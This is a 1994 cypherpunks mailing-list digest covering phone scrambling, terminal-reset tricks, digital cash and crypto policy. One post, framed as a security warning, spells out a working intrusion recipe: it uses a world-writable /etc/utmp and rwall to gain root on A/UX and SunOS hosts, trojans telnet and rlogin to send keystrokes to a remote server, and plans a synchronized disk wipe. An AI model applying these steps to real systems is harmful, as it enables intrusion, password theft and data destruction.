For digital Encryption you would need a 900MHz phone. Finding one two lines, depending on where you are might be a bit of a search. No 40-50MHz phone I have worked with (Motorola, Toshiba, Panasonic) has used digital encryption. I would recommend ATT (no I'm not crazy) or Panasonic.

Groove on dude
Michael Conlen

From meconlen at IntNet.net Thu Dec 8 07:53:37 1994
From: meconlen at IntNet.net (Michael Conlen)
Date: Thu, 8 Dec 94 07:53:37 PST
Subject: NYT on Insecure Phones
In-Reply-To:
Message-ID:

On Thu, 8 Dec 1994, Jonathan Cooper wrote:

> Cell1 is just not incredibly smart about security, physical or
> otherwise. An acquaintance of mine found a "Fraud Alert Bulletin" in a
> Cellular One trash can which warned about the dangers of not shredding
> your trash. Of course, in the same bag was wads of credit card info, NAM
> & ESN info, etc.

Nor will they hesitate to give out Cellular programming info over the phone if you can find their Internal Customer Care phone number, found by looking at a Cellular One display such as the ones Circuit City is using in West Florida

Groove on dude
Michael Conlen

From meconlen at IntNet.net Thu Dec 8 07:57:14 1994
From: meconlen at IntNet.net (Michael Conlen)
Date: Thu, 8 Dec 94 07:57:14 PST
Subject: My apologies to the list (Re: ANSI Bombs are still a threat?)
In-Reply-To: <941207.234039.2D7.rusnews.w165w@cybrspc.mn.org>
Message-ID:

On Wed, 7 Dec 1994, Roy M. Silvernail wrote:

> That person asks that I post instructions for recovering from so heinous
> an attack. All I can suggest is escaping to a shell and doing a 'clear'
> (or, under MS-DOS, 'cls').

I have found that some attacks that leave your screen doing strange things can be recovered from by using the talk command. This program, on UNIX machines seems to reset a lot of things that might have gone awry with your screen.

Groove on Dude
Michael Conlen

From samman at CS.YALE.EDU Thu Dec 8 09:01:34 1994
From: samman at CS.YALE.EDU (Ben)
Date: Thu, 8 Dec 94 09:01:34 PST
Subject: My apologies to the list (Re: ANSI Bombs are still a threat?)
In-Reply-To:
Message-ID:

>
>
> On Wed, 7 Dec 1994, Roy M. Silvernail wrote:
>
> > That person asks that I post instructions for recovering from so heinous
> > an attack. All I can suggest is escaping to a shell and doing a 'clear'
> > (or, under MS-DOS, 'cls').
>
> I have found that some attacks that leave your screen doing strange
> things can be recovered from by using the talk command. This program, on
> UNIX machines seems to reset a lot of things that might have gone awry
> with your screen.

If you hit the control button with both mouse buttons at the same time in twm(an X windows manager) there pops up a menu--choose the 'reset terminal' option.

Ben.

Who's not signing cause the DEC Rainbow he's using to dial in isn't secure.

From Tony.Gurnick at nzdairy.co.nz Thu Dec 8 09:51:22 1994
From: Tony.Gurnick at nzdairy.co.nz (DNA)
Date: Thu, 8 Dec 94 09:51:22 PST
Subject: Purdy & hickory
Message-ID: <94120906494434@nzdairy.co.nz>

Does anyone have any info on the PURDY & HICKORY hash algorithms that VMS uses in its authentication services!

Thanks

T

From rseymour at reed.edu Thu Dec 8 10:02:38 1994
From: rseymour at reed.edu (Robert Seymour)
Date: Thu, 8 Dec 94 10:02:38 PST
Subject: Fixing Flash/ANSI Bomb/Terminal Screwup
In-Reply-To:
Message-ID:

In the world according to Ben:
> > On Wed, 7 Dec 1994, Roy M. Silvernail wrote:
> > > That person asks that I post instructions for recovering from so heinous
> > > an attack. All I can suggest is escaping to a shell and doing a 'clear'
> > > (or, under MS-DOS, 'cls').
> > I have found that some attacks that leave your screen doing strange
> > things can be recovered from by using the talk command. This program, on
> > UNIX machines seems to reset a lot of things that might have gone awry
> > with your screen.
> If you hit the control button with both mouse buttons at the same time in
> twm(an X windows manager) there pops up a menu--choose the 'reset
> terminal' option.

Flash/ANSI Bomb/terminal codes or just general screwups can be quite a pain. Though the methods suggested above may work in some circumstances, they won't work all the time. One method I have found to be quick and highly effective is the following alias (shown from my bash rcfile, but you can easily translate to other shells):

## This last one is a nifty little way to fix the terminal after being
## flashed or otherwise messed up by some program. If your terminal is
## really screwed up, it may not be able to parse the return (^M) correctly.
## If so, use linefeed (^J), then type "sanity", then type another linefeed.
alias sanity='stty 500:5:96c:3b:0:3:1c:8:17:4:0:0:0:500:5:96c:8000003b:3:1c:8:17:4:0:0:0:ff:ff:ff:4:0:1a:11:13:0:0:1a:ff'

(N.B.: make sure that is one line for the alias). Unfortunately this does assume that your terminal is at least semi-clued (i.e. minimal vt100 features), but it should be able to get you back to a sane setup wherein you can re-source your own rcfiles or set the terminal parameters yourself. There is also a script called unflash which will fix basic terminal codes attacks, but it is less robust (it just echoes {esc}c {esc}0 and clears the screen, which will end text properties but not necessarily fix status lines and other problems). If you use it, let me know how this generalizes, it's been quite stable in my experience.

The real tough one to deal with is xterm, which can have font properties set through escape codes, a well designed talk request, terminal write, or irc bomb can make it entirely unintelligible and very difficult to recover. Get your admin to install a good fingerd/talkd and/or use mesg n to prevent access in the first place. There are several around now which disallow terminal codes in the talk requester's id and check IPs, etc.

|Robert

--
Robert Seymour rseymour at reed.edu Reed College Artificial Life Project NeXTmail, MIME, PGP accepted WWW Pages

From Tony.Gurnick at nzdairy.co.nz Thu Dec 8 10:20:54 1994
From: Tony.Gurnick at nzdairy.co.nz (DNA)
Date: Thu, 8 Dec 94 10:20:54 PST
Subject: Breaking the NSA
Message-ID: <94120907194944@nzdairy.co.nz>

Frenchie wrote

>Tony.Gurnick at nzdairy.co.nz wrote:
>
>>Frenchie Wrote
>>
>> Not that easy. They would just crack the code and *another*
>> acronym based agency would come up with a different reason to
>> seize you and your computer. It would seem unrelated to anyone
>> but *you* since you would know what you did but would have no
>> way to prove that your original infraction is why you are doin'
>> time. Hope that makes some sense.
>>
>>Maybe. What if the only way to do this was illegal?
>
> Then you would have to hope you never do anything illegal. Then
> no (pick your acronym) agency would be able to easily trump up
> a charge that could be used as an infiltration technique to get
> to your system *legally*. If they want to bad enuff I'm sure
> breaking the law to catch you doing something would be arranged.
> Violating National Interests maybe?
>

Um, you would still know pgp/rsa/idea has been broken???

>> If it isn't something *really good* they probably wouldn't come after
>> you anyway.
>
>>What's the definition of GOOD?
>
> PGP?...3xDES?....RC5?....plans for an A-Bomb with instructions for
> construction and location of available nuclear material?...pick one.

Yeah That's pretty good

>> #3 I can agree with. I don't think that NSA would tip their hand
>> and let on to us that they can read our stuff. At least, not directly.
>
>>We may as well find out.
>
> Agreed, the problem is finding a way to be sure! A little
> misinformation has a habit of going a long way.

Huh?

>> One more thing. Don't you think that they subscribe to the Cypherpunk
>> list just to see this kind of logic?
>
>>Maybe, But isn't freedom of speech what this list is about and what your
>>constitution does!
>
>
> Be careful...not everyone here is a U.S. resident or citizen.
> At least I don't think so.
> But since I am I know how precariously balanced the definition
> of free speech is. The Supreme Court in cahoots with law
> enforcement and lawmakers could change things pretty quick!
> Throw in a handy list of names......u know the rest.

Well I'm not one (a us cit I mean), but another way of putting what I said is
It's like some private company invents a cipher and you break it
And they get pissed at you for doing it. But you did them a favour really cause someone more unscrupulous than you wouldn't have told them.

So the NSA should be glad, and encourage us to speak like this and I think we should continue along this track! Unless of course they wish to comment....?

> BTW....I ain't one of 'em, and I wouldn't tell if I was. :)
>>Prove it
>[I see my smiley was disregarded]

Sorry, I forgot my smile, I was quite busy yesterday and thought I could get a quick reply in. I bolloxed that up! Here's two ))

>Proof you say!
>A classical dilemma:
> If I say I am (one of them) it implies gathering
> intelligence or a reason to sow suspicion even if I am not.
> Denial implies I am what I say I am not.
> So, even though I am not, it would be impossible to *convince*
> you of that. If I was I still couldn't produce *believable*
> evidence to support the statement.
> Take my advice: Don't Trust Nobody.

That's a good one

>Is there a reason *you* don't sign your messages? Hehehe.... :)

Cause I forgot...busy...chicken!

T

From jamesd at netcom.com Thu Dec 8 10:26:41 1994
From: jamesd at netcom.com (James A. Donald)
Date: Thu, 8 Dec 94 10:26:41 PST
Subject: DigiCash
In-Reply-To: <199412081440.DAA03825@akeake.its.vuw.ac.nz>
Message-ID: <199412081826.KAA08641@netcom10.netcom.com>

Paul Foley writes
>
> Could someone explain the concept of "DigiCash" to me, or tell me where to
> get info from?
>
> Thanks.

http://www.digicash.com/

Click on publications.

--
---------------------------------------------------------------------
We have the right to defend ourselves and our
property, because of the kind of animals that we        James A. Donald
are. True law derives from this right, not from the
arbitrary power of the omnipotent state.                jamesd at netcom.com

From alex at omaha.com Thu Dec 8 12:09:51 1994
From: alex at omaha.com (Alex Strasheim)
Date: Thu, 8 Dec 94 12:09:51 PST
Subject: cut & choose
Message-ID: <199412082010.OAA00148@omaha.omaha.com>

-----BEGIN PGP SIGNED MESSAGE-----

In Applied Cryptography, Schneier describes digital cash protocols that depend on the cut and choose method: Alice prepares 100 anonymous money orders for $100, sends them all to the bank, which opens all the envelopes except one picked at random. If the 99 envelopes checked have money orders for $100, then the bank is confident that the one they sign blindly will be for $100 as well.

Chaum's system uses different keys for different denominations. Alice only sends one envelope, and the bank uses its $100 key to sign it.

I don't understand why anyone would use the cut and choose protocol over denominated keys. Chaum's method seems a lot cleaner to me and more secure. It obviously uses less bandwidth. What am I missing here?

==
Alex Strasheim | finger astrashe at nyx.cs.du.edu
alex at omaha.com | for my PGP 2.6.1.
public key

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
-----END PGP SIGNATURE-----

From mccoy at io.com Thu Dec 8 12:53:00 1994
From: mccoy at io.com (Jim McCoy)
Date: Thu, 8 Dec 94 12:53:00 PST
Subject: cut & choose
In-Reply-To: <199412082010.OAA00148@omaha.omaha.com>
Message-ID: <199412082052.OAA21137@pentagon.io.com>

> From: Alex Strasheim
>
> In Applied Cryptography, Schneier describes digital cash protocols that
> depend on the cut and choose method [...] Chaum's system uses different
> keys for different denominations. [...]
>
> I don't understand why anyone would use the cut and choose protocol over
> denominated keys. Chaum's method seems a lot cleaner to me and more
> secure. It obviously uses less bandwidth. What am I missing here?

Cut and choose is necessary for several protocols. It is necessary for cash protocols that do not use blinding, it is necessary for the cash protocols that include identification, and in general it is necessary for any protocol where the signer does not know the contents of what they are signing _and_ the contents need to be formed in a particular fashion.

Denominated keys requires the user (the one accepting the packet and verifying it) to keep track of more information, such as which keys correspond to which denominations. In cut and choose the end user only needs to know one key and the other information is carried in the packet itself. There is a cost in each system, it is just a question of who bears the cost and what abilities the cost gives the system...

jim

From crawford at scruznet.com Thu Dec 8 16:25:01 1994
From: crawford at scruznet.com (Michael D.
Crawford)
Date: Thu, 8 Dec 94 16:25:01 PST
Subject: How to Destroy the Internet (was Info about Linux)
Message-ID: <199412090022.QAA09606@scruz.net>

-----BEGIN PGP SIGNED MESSAGE-----

I write:
> You don't need to have a firewall to tighten up the security on your
> machine. Read this book if you're going to put a Unix box of any sort on
> the Internet, or you might wake up some day to find someone's erased your
> hard disk from the other side of the globe.
>
Matt Bartley writes
> Is it that dangerous? I wonder how machines in college, which didn't
> have firewall protection that I know of, survived. Then again, that
> was close to 3 years ago - maybe things are worse now.

Before I proceed, let me point out that the following procedure has been documented for more than five years. Some may regard it as irresponsible to publish this information, but I consider it a greater danger that many Unix machine owners fail to appreciate the seriousness of this problem.

How to erase the hard disk of almost every Unix machine on the Internet:

Apple's A/UX 2.0 was, at least initially, shipped with two well-known security holes, holes which had been documented for years in the CERT advisories. When I was the MacTCP test engineer at Apple, I beta tested A/UX, found these holes, and tried very hard to get Apple to close them before shipping the product, which was primarily meant as Apple's candidate for an $80 million Air Force contract. I found this pretty ironic, but when I griped about it at Apple - and I griped about it increasingly loudly as the ship date approached - all I got was sternly scolded. Apple's internal netadmins did invite me to play "capture /flag" on their internal net Unix machines, which was fun. I never could break into /flag.

Security hole #1: A/UX ships with the guest login enabled, with no password. Thus anyone can log in to any A/UX machine on the Internet.

Security hole #2: A/UX was largely derived from SunOS, and shared a hole with older versions of SunOS. The /etc/utmp file is world writable. The reason this is done is so that shell windows in the MacOS process on A/UX, or under SunView on the Sun, can appear to be logged in terminals, I think mainly to allow "wall" to write messages to all the windows.

This is a deadly error. If /etc/utmp is world writable, anyone who can log in, with a little practice, can become root and cover evidence of their login in about 30 seconds.

This is done as follows:

0. Using HINFO records from the name service, and looking at the SMTP, FTP, and login banners of many machines on the Internet, collect the addresses of many A/UX machines.

For each A/UX machine do 1 - 15:

1. On your local machine, running the window system of your choice, type in a no-password passwd file entry for root into a window. Leave the window open.
2. On your local machine, create a file in utmp format in which ../tmp/foo is the only logged in terminal. Copy it to the clipboard (this will be a binary file - you have to write a small C program to create it).
3. Log in as guest over the internet.
4. cat /etc/utmp | od -h
5. cp /etc/passwd /tmp/Ex12345
6. cat > /etc/utmp
7. Paste the contents of your clipboard into the terminal window and press control-D. Now you've made /dev/../tmp/foo the only terminal which appears to be logged in.
8. ln -s /etc/passwd /tmp/foo
9. rwall "root::0:0::/:/bin/sh". This message is broadcast to all logged in terminals, thus replacing the password file with your own.
10. su ... now you are root. Time to cover your tracks!
11. mv /tmp/Ex12345 /etc/passwd
12. Copy the hex dump that just scrolled by on your screen to the clipboard. Paste it into a program that you have written that converts it back into binary, removes all the guest login records from it, and places the result back on the clipboard.
13. cat > /etc/utmp ... paste into the terminal window and press ^D.
14. Relax.
Take a break and look upon your handiwork. The only evidence of your connection is the existence of a couple of shell processes and a telnet or rlogin daemon. "who" or "users" will not show you; the machine's users will have to examine ps listings very carefully to see that you are logged in. 15. When you've sufficiently regained your composure, use ftp to fetch patched telnet and rlogin binaries from your machine. With telnet you could just set the debug flag to dribble all the user's keystrokes into a file, but it would have more finesse to send a UDP packet of the first few keystrokes of each session to a server you have somewhere on the internet. 16. Collect passwords to every machine that allows logins from the machine you have just hacked. If you get any root passwords, go to step 15. (be sure to collect enough keystrokes to catch any su's that are done after logging in as a regular use. If the passwords are to any other A/UX machines, or old SunOS machines, go to step 4. 17. After you have collected lots of root passwords, right a C program that will wait for a certain delay, then turn off all networking using ifconfig (to prevent the admin from getting in and stopping the damage), mmap the raw partitions of all the mounted hard disks, make sure that the whole program is sitting in physical ram, then write garbage into the mmap'ed memory blocks. Install this program on all your target machines, with the delay synchronized to each system's own clock so that the damage happens simultaneously worldwide. You will probably want to distribute installation programs to a few dozen of your hacked machines, and have them all install on the machines nearby, to prevent word from getting out before the installations are all complete. If you're lucky, you can get the passwords to some backbone routers and partition the internet to help prevent the spread of the warning. 
The reason your college's machines have not been hacked yet is because there are many machines on the internet, and the hackers have not got around to it yet.

Read Firewalls and Internet Security, by William R. Cheswick and Steven M. Bellovin, ISBN 0-201-63357-4, before this happens to you.

Any machine that allows logins from your own machine will be compromised, if your machine is compromised. Every machine that allows logins from any machine that allows logins from you will then be compromised, and so on.

If the security is not tightened up considerably on the hosts connected to the Internet, someone's going to do something like this and bring the whole thing down. The Morris Worm did a great deal of damage to the net, but did little in the way of monetary damage beyond wasted employee time. Something like this would do damage in the billions of dollars.

Regards,

Michael D. Crawford
crawford at scruznet.com <- Please note change of address.
crawford at maxwell.ucsc.edu <- Finger me here for PGP Public Key.

-----BEGIN PGP SIGNATURE-----
Version: 2.6
-----END PGP SIGNATURE-----

From eric at remailer.net Thu Dec 8 17:29:35 1994
From: eric at remailer.net (Eric Hughes)
Date: Thu, 8 Dec 94 17:29:35 PST
Subject: backing ecash
In-Reply-To: <199412050431.WAA00176@omaha.omaha.com>
Message-ID: <199412090227.SAA24809@largo.remailer.net>

   From: Alex Strasheim

   Suppose Digicash opened up a digital currency exchange in Amsterdam.
   [...]

Left unexamined here are the ways in which various things can go wrong.

   Edollars would still have value here in Lincoln, NE USA.

How much? Not full value, that's for sure, because of the risk cost associated with getting the edollars back to Amsterdam. What happens when something goes wrong in Amsterdam? What happens? What effective recourse does a USA holder have with respect to a Netherlands company?

Your basic idea, however, is right on target, that you don't need to be a bank to issue digital currency. On the other hand, with that realization your problems are only beginning.

Eric

From eric at remailer.net Thu Dec 8 17:36:43 1994
From: eric at remailer.net (Eric Hughes)
Date: Thu, 8 Dec 94 17:36:43 PST
Subject: Dec. 10th Bay Area Cypherpunks Meeting
In-Reply-To: <9412070253.AA07672@snark.imsi.com>
Message-ID: <199412090234.SAA24815@largo.remailer.net>

   Aren't there multicast provisions at SGI? Eric?

We may be multicasting this weekend. Far more important than my involvement is that of our host there at SGI, Katy. Her crew gets the MBONE running. There are some fiddly things with the SGI firewall, etc., that I just don't understand.

So I'm passing the buck. Katy?
Eric

From dave at esi.COM.AU Thu Dec 8 18:02:43 1994
From: dave at esi.COM.AU (Dave Horsfall)
Date: Thu, 8 Dec 94 18:02:43 PST
Subject: Breaking the NSA
In-Reply-To: <9412081408.ZM999@wiley.sydney.sgi.com>
Message-ID:

On Thu, 8 Dec 1994, Ian Farquhar wrote:

> I am told that a similar trick was tried by some people back in the
> early 1980's, when they were trying to figure out if the NSA could
> indeed break DES. There was no official response to these attempts.

Or then again, maybe the people involved suddenly had the last 10 years or so of their tax returns scrutinised; maybe they were denied social benefits; etc.

--
Dave Horsfall (VK2KFU) | dave at esi.com.au | VK2KFU @ VK2AAB.NSW.AUS.OC | PGP 2.6
Opinions expressed are mine. | E7 FE 97 88 E5 02 3C AE 9C 8C 54 5B 9A D4 A0 CD

From nobody at CSUA.Berkeley.EDU Thu Dec 8 18:25:23 1994
From: nobody at CSUA.Berkeley.EDU (Tommy the Tourist (Anon User))
Date: Thu, 8 Dec 94 18:25:23 PST
Subject: A disturbing story
Message-ID: <199412090224.SAA17068@soda.CSUA.Berkeley.EDU>

Check out the story "CIA to pay $410 000 to maligned female officer" in Thursday's SF Chronicle (http://sfgate.com/new/schron/dec-08-94/mn1199.html). The interesting part isn't the stuff about sexual harassment. The interesting things were paragraphs 8 and 9:

>For example, Brookner was accused by the CIA's inspector general of
>drunkenly pawing a male subordinate at a 1990 Christmas party at her home in
>Jamaica.
>
>But the government lawyers defending the CIA then said that the man was not
>a subordinate, but a high-ranking Drug Enforcement Administration official
>who attended the party.

Why would there be a high-ranking DEA official at a CIA Christmas party?

Hmmm.
------------
To respond to the sender of this message, send mail to remailer at soda.berkeley.edu, starting your message with the following 7 lines:
::
Response-Key: the-clipper-key

====Encrypted-Sender-Begin====
MI@```%)^&2?(E
Message-ID: <9412090252.AA29178@mycroft.rand.org>

> "Ian Farquhar" writes:
> I am told that a similar trick was tried by some people back in the
> early 1980's, when they were trying to figure out if the NSA could
> indeed break DES. There was no official response to these attempts.

When I ported Adventure (the original 350-point version) to Unix in 1976 I used a light interrupted-key Vigenere-like encryption on the database. I heard through a circuitous route a little later that some of the players at NSA had found it easier (or perhaps more fun) to solve the database than to solve the game. In the next version (abt 1978) I used DES on the database (yes, I know somebody could disassemble it and find where I left the key, but that's not terribly trivial either for a program that size). I never heard back one way or the other whether they'd hacked it again.

	Jim Gillogly
	19 Foreyule S.R. 1994, 02:50

From skaplin at skypoint.com Thu Dec 8 19:33:31 1994
From: skaplin at skypoint.com (Samuel Kaplin)
Date: Thu, 8 Dec 94 19:33:31 PST
Subject: 2048-bit keys??
In-Reply-To: <199412042331.PAA14197@jobe.shell.portal.com>
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

In article <199412042331.PAA14197 at jobe.shell.portal.com>, you wrote:

> just curious, how many random bytes does it take to generate these
> fuckers and can the keyservers out their handle em yet?

I don't know about the servers, but I am told viacrypt can't handle them. I tried to upload my big key to sled for verification and according to them viacrypt choked on it...strange.

==============================================================================
Those who cannot remember the past are condemned to repeat it.
- George Santayana
==============================================================================
skaplin at skypoint.com                  | "...vidi vici veni" - Overheard
                                         | outside a Roman brothel.
PGP encrypted mail is accepted and       |
preferred.                               | Change is the only constant in the
                                         | Universe..."Four quarters, please."
E-mail key at four11.com for PGP Key or  |
Finger skaplin at mirage.skypoint.com    | Smile!! Big brother is watching.
==============================================================================

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
-----END PGP SIGNATURE-----

This message digitally signed to verify the identity of the writer.

From jamesh at netcom.com Thu Dec 8 19:56:22 1994
From: jamesh at netcom.com (jamesh at netcom.com)
Date: Thu, 8 Dec 94 19:56:22 PST
Subject: A disturbing story
In-Reply-To: <199412090224.SAA17068@soda.CSUA.Berkeley.EDU>
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

>
>
> Why would there be a high-ranking DEA official at a CIA Christmas party?
>

Keeping an eye on the LAPD training officer?

JJH

- -------------------------------------------------------------------------------
Oh Yeah: Disclaimer, Disclaimer, Disclaimer, The views expressed belong only to me (and maybe Courtny). It should not reflect on any others (except Mario from Canada, a real perv).
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
-----END PGP SIGNATURE-----

From ktk at anemone.corp.sgi.com Thu Dec 8 23:12:58 1994
From: ktk at anemone.corp.sgi.com (Katy Kislitzin)
Date: Thu, 8 Dec 94 23:12:58 PST
Subject: Dec. 10th Bay Area Cypherpunks Meeting
In-Reply-To: <199412090234.SAA24815@largo.remailer.net>
Message-ID: <9412090712.AA28021@anemone.corp.sgi.com>

i've decided to punt on mbone for now... technical difficulties have plagued making it happen. seems like many things can happen between a fri afternoon setup and a sat broadcast. will try again, probably in feb, but not for this meeting.

--kt

From claborne at microcosm.sandiegoca.NCR.COM Fri Dec 9 00:27:26 1994
From: claborne at microcosm.sandiegoca.NCR.COM (Claborne, Chris)
Date: Fri, 9 Dec 94 00:27:26 PST
Subject: Moto Secure Clear digital?
Message-ID: <2EE773EF@microcosm.SanDiegoCA.NCR.COM>

I got one a while back and I don't like it. The range is poor and the sound quality is not all that great. A novice newby can't break it but anyone with experience can. I've seen posts on how it works but can't remember.

AT&T has some kind of security feature on their 900Mhz phone but I haven't looked into it.

2
-- C --

>From: Jonathan Cooper
>------------------------------------------------------------------------------
>> I just got a second phone line, and decided that if I was going to get a 2-line
>> phone it might as well be a good one, so I am considering a Motorola Secure
>> Clear cordless 2-line phone with speakerphone. This will be quite an investment,
>> so I was wondering whether the Secure Clear phones are digitally encrypted or
>> merely scrambled using some analog method. Anybody know about this? How secure
>> are these phones really? --Wes
>
> As I understand it the system is a cheezy form of frequency
>inversion. It'll stop your neighbors with a scanner, but that's about it.
>
>-jon
>
>( --------[ Jonathan D. Cooper ]--------[ entropy at intnet.net ]-------- )
>( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4 5B 12 A0 35 E0 9B C0 01 )
>
>

From eric at remailer.net Fri Dec 9 05:43:46 1994
From: eric at remailer.net (Eric Hughes)
Date: Fri, 9 Dec 94 05:43:46 PST
Subject: Anonymity in the foreign exchange markets
Message-ID: <199412091441.GAA25607@largo.remailer.net>

The following two page spread advertisement is from the Economist Nov 12, 1994.

--------------------------------------------

Wouldn't the speculators love to know where your DM2.5 billion is right now.

Your government has just raised DM2.5 billion. Your task is to convert those Deutsche marks into the currency of your country. And a whole world of speculators can't wait. They know they can make money at your expense by detecting and anticipating such a large currency move.

But you have a surprise for them. Your currency is moving through the international markets right now -- right under the speculator's noses -- and they haven't a clue.

Because you've found a firm that is more than a leading international trader. It's a select group of professionals -- strategists, researchers and economists with their own technology, their own global network and a distinctive approach to foreign exchange.

They monitor the capital markets, not just trade flows, to get a more accurate picture of currency trends. Their strategic thinking helps pinpoint when -- and when not -- to make certain currency moves. And while they deal in all currencies, all markets and all size transactions, large positions such as yours are handled with special discretion.
That's why, right now, your DM2.5 billion has been divided up -- into trades small enough to be undetected but large enough to be cost-efficient -- and blended strategically into the firm's daily global business.

Most importantly, when the trading becomes fast and furious, these people make sure your transactions come first. You know they'll see you through it all.

MORGAN STANLEY

[The picture is of a chameleon.]

--------------------------------------------

Note that not only are they selling anonymization services for *huge* sizes, they're also selling traffic analysis avoidance.

From what I know about the business, a typical commission is 1%, or somewhere around $10 million for the advertised transaction.

Eric

From Agorist003 at aol.com Fri Dec 9 05:48:27 1994
From: Agorist003 at aol.com (Agorist003 at aol.com)
Date: Fri, 9 Dec 94 05:48:27 PST
Subject: L.A. area meeting
Message-ID: <941209084822_1476905@aol.com>

There will be a meeting under the announced name "L.A. Cypherpunks" at the California Coffee House, 4455 Overland Avenue, Culver City, CA 90230 (310) 559-8868 to discuss privacy issues and tactics. If any of y'all want to show up and flame on about your pet projects and sell stuff, it is a free, informal gathering -- show up any time between noon and 5 P.M.

BCNU!

Kent - jkh at story.com (If wsb gets fixed again)

From sinclai at ecf.toronto.edu Fri Dec 9 06:53:36 1994
From: sinclai at ecf.toronto.edu (SINCLAIR DOUGLAS N)
Date: Fri, 9 Dec 94 06:53:36 PST
Subject: Secure DAC?
Message-ID: <94Dec9.095259edt.3818@cannon.ecf.toronto.edu>

-----BEGIN PGP SIGNED MESSAGE-----

I was looking through the PMI analog IC databook from 1988. Specifically, I was looking at the "DAC-08 8-bit high-speed multiplying D/A converter". The chip is interesting in that it has two outputs. One is the current corresponding to the digital value on the input lines, and the other is the current corresponding to NOT the digital values. Thus, the two currents sum to a constant.
The book says:

"Power consuption may be calculated as follows:
Pd = (I+) (V+) + (I-) (V-). A useful feature of the DAC-08 design
is that supply current is constand and independent of input logic
states; this is useful in cryptographic applications and further serves to
                          ^^^^^^^^^^^^^
reduce the size of the power supply bypass capacitors." -- Page 11-34.

All typos mine.

I fail to see how this would increase cryptographic potential. However, it would seem to mask the device's EMR. The application notes state that it is useful in CRT display drivers, audio encoders, &c. These are all devices that are susceptible to TEMPEST monitoring (or whatever the correct name is). If one output goes to the desired next stage (the electron gun in a CRT for example) and the other goes to a matched dummy load, it would seem that the overall EMR is constant. This approach would obviate the need for bulky shielding, though it might not be as secure.

-----BEGIN PGP SIGNATURE-----
Version: 2.6
-----END PGP SIGNATURE-----

From eric at remailer.net Fri Dec 9 07:20:04 1994
From: eric at remailer.net (Eric Hughes)
Date: Fri, 9 Dec 94 07:20:04 PST
Subject: Secure DAC?
In-Reply-To: <94Dec9.095259edt.3818@cannon.ecf.toronto.edu>
Message-ID: <199412091618.IAA25744@largo.remailer.net>

   From: SINCLAIR DOUGLAS N

   [re: a constant current consumption chip]

   I fail to see how this would increase cryptographic potential.
   However, it would seem to mask the device's EMR.

One of the largest sources of radiated signal goes out the power supply. Some of the really high security chips, evidently, double every gate for constant current draw.

Eric

From joshua at dee.retix.com Fri Dec 9 07:24:35 1994
From: joshua at dee.retix.com (joshua geller)
Date: Fri, 9 Dec 94 07:24:35 PST
Subject: L.A. area meeting
In-Reply-To: <941209084822_1476905@aol.com>
Message-ID: <199412091525.HAA06316@sleepy.retix.com>

> There will be a meeting under the announced name "L.A. Cypherpunks"
> at the California Coffee House, 4455 Overland Avenue, Culver City,
> CA 90230 (310) 559-8868 to discuss privacy issues and tactics.
> If any of y'all want to show up and flame on about your pet projects
> and sell stuff, it is a free, informal gathering -- show up any time
> between noon and 5 P.M.

what day?

josh

From crypto at nas.edu Fri Dec 9 07:46:37 1994
From: crypto at nas.edu (CRYPTO)
Date: Fri, 9 Dec 94 07:46:37 PST
Subject: Question #1 to the community regarding National...
Message-ID: <9411097869.AA786998597@nas.edu>

Subject: Question #1 to the community regarding National Cryptography Policy

As many of you know, the National Research Council is undertaking a study of national cryptography policy (description available on request to CRYPTO at NAS.EDU). This note is the first of a number of questions that will be posted to the Internet community in our attempt to solicit input on a broad scale. Please circulate this request to anyone that you think might be able to contribute.

The question of this posting is the following:

How, if at all, do capabilities enabled by new and emerging technology in telecommunications (e.g., key-escrow encryption technologies, digital telephony) and electronic networking make it _easier_ for those who control that technology to compromise and/or protect the interests of individual end users? Please use as the standard of comparison the ease _today_ of compromising or protecting these interests. We are interested in scenarios in which these interests might be compromised or protected both individually and on a large scale. Please be sure to tell us the interests you believe are at stake.

Please send your comments on this question to CRYPTO at NAS.EDU.
From ddt at lsd.com Fri Dec 9 08:56:24 1994
From: ddt at lsd.com (Dave Del Torto)
Date: Fri, 9 Dec 94 08:56:24 PST
Subject: BofA+Netscape
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

Lads,

I thought many of you would be interested in the text of this story. I'm wondering if anyone has any comments on the encryption mechanism (i.e. "eavesdropping" protection) being used. I believe, from my visits to the Netscape (formerly Mosaic) Communications Inc. offices that they are using RSA, but I'm not sure how *secure* their implementation is (eg. key size, etc.).

I'll be contacting my local branch to inquire as to how soon I'll be able to use the service and will post my experiences with it as soon as possible.

This development certainly signals a major breakthrough in E$ technology.

   dave
____________________________________________________________
"Money is the root of all Evil. Send $9.95 for more info."

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= cut here =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Bank of America Goes Online With Credit Card Service

By David Einstein, Chronicle Staff Writer

In a major step toward electronic commerce, Bank of America announced yesterday it will launch a system next month for processing credit card transactions on the Internet.

The bank, second largest in the United States after Citicorp, will use software from Netscape Communications to make it safe for merchants and consumers to do business online.

Lack of a secure way to transmit credit card information has been the biggest obstacle to conducting business on the Internet, a global computer network reaching some 30 million people.

"Secure payment processing is a critical element to making electronic commerce happen," said Netscape spokeswoman Rosanne Siino. She called the BofA announcement "a pretty big deal for us."

Netscape's software incorporates data encryption that protects online communications from eavesdroppers. It also gives both parties in a transaction the ability to verify each other's identity.

BofA intends to market its new service to merchants for whom it currently processes ordinary credit card transactions. The service will be free to consumers, who will be able to make purchases with almost any major credit card.

Officials of the San Francisco based bank said they do not expect online processing to generate a flood of business immediately.

"We anticipate that the maturity of this product is going to take a year if not years to develop," said Jim Aviles, vice president of marketing for BofA Merchant Services.

Electronic shopping is not expected to catch on until the public gains widespread, low-cost access to the Internet. Full access is still expensive and not available everywhere.

Netscape, an 8-month-old company based in Mountain View, is one of the leading makers of software used to navigate the Internet via a Windows-like interface.

One of the company's founders is Marc Andreessen, the 23-year-old whiz kid who developed Mosaic, the navigation program that ignited interest in the Internet last year.

Yesterday's announcement was the latest in a series of deals involving Netscape. Late last month, MCI said it would use the company's technology as the core of its planned internetMCI electronic shopping service.

San Francisco Chronicle
6 December 94 (Business)
Section D, Pg 1 ("D1")

- -30-

-----BEGIN PGP SIGNATURE-----
Version: 2.6somethingorother
-----END PGP SIGNATURE-----

From hfinney at shell.portal.com Fri Dec 9 09:01:02 1994
From: hfinney at shell.portal.com (Hal)
